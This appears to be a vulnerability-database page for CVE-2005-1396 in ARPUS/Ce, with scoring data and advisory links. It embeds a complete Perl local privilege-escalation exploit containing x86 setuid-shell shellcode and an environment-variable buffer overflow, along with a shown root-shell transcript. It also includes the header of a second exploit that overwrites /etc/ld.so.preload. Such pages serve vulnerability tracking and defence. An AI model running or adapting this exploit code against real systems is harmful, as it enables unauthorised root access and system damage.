CVE-2005-1396
published 2005-05-03CVE-2005-1396: Race condition in Ce/Ceterm (aka ARPUS/Ce) 2.5.4 and earlier allows local users to write to arbitrary files via a symlink attack on the ce_edit_log temporary…
PriorityP417low1.2CVSS 2.0
AVLACHAuNCNIPAN
EXPLOIT
EPSS
0.73%
49.6th percentile
Race condition in Ce/Ceterm (aka ARPUS/Ce) 2.5.4 and earlier allows local users to write to arbitrary files via a symlink attack on the ce_edit_log temporary file.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
ARPUS/Ce - Local Overflow (setuid)
exploitdb·2005-05-01
CVE-2005-1396 ARPUS/Ce - Local Overflow (setuid)
ARPUS/Ce - Local Overflow (setuid)
---
#!/usr/bin/perl -w
#
# Setuid ARPUS/ce exploit by KF - kf_lists[at]digitalmunition[dot]com - 4/21/05
#
# Copyright Kevin Finisterre
# kfinisterre@threat:/tmp$ ./ce_ex.pl
# sh-2.05b# id
# uid=0(root) gid=1000(kfinisterre)
# groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),1000(kfinisterre)
#
# 57 bytes long
$sc = "\x90"x512;
$sc .= "\x31\xd2\x31\xc9\x31\xdb\x31\xc0\xb0\xa4\xcd\x80";
$sc .= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b";
$sc .= "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd";
$sc .= "\x80\xe8\xdc\xff\xff\xff/bin/sh";
$buf = "\x90" x (4120-569);
$buf .= $sc;
$buf .= (pack("l",(0xbfffa187)) x2);
$ENV{"XAPPLRESLANGPATH"} = $buf;
exec("/usr/bin/ce");
# milw0rm.com [2005-05-01]
Exploit-DB
ARPUS/Ce - Local File Overwrite (setuid)
exploitdb·2005-05-01
CVE-2005-1396 ARPUS/Ce - Local File Overwrite (setuid)
ARPUS/Ce - Local File Overwrite (setuid)
---
/*
* Copyright Kevin Finisterre - ripped from my perl_ex.c
*
* ** DISCLAIMER ** I am in no way responsible for your stupidity.
* ** DISCLAIMER ** I am in no way liable for any damages caused by compilation and or execution of this code.
*
* ** WARNING ** DO NOT RUN THIS UNLESS YOU KNOW WHAT YOU ARE DOING ***
* ** WARNING ** overwriting /etc/ld.so.preload can severly fuck up your box (or someone elses).
* ** WARNING ** have a boot disk ready incase some thing goes wrong.
*
* Setuid ARPUS/ce exploit by KF - kf_lists[at]digitalmunition[dot]com - 4/21/05
*
* kfinisterre@kfinisterre01:~$ ls -al /usr/bin/ce
* -rwsr-xr-x 1 root bin 630010 Sep 27 2004 /usr/bin/ce
*
* Tested against http://168.158.26.15/ce/ce-0260-intel-pentium-linux-fedoracore3.tar.gz
No writeups or analysis indexed.
http://lists.grok.org.uk/pipermail/full-disclosure/2005-May/033705.htmlhttp://secunia.com/advisories/15197http://securitytracker.com/id?1013855http://www.digitalmunition.com/DMA%5B2005-0501a%5D.txthttp://www.osvdb.org/16050http://lists.grok.org.uk/pipermail/full-disclosure/2005-May/033705.htmlhttp://secunia.com/advisories/15197http://securitytracker.com/id?1013855http://www.digitalmunition.com/DMA%5B2005-0501a%5D.txthttp://www.osvdb.org/16050
2005-05-03
Published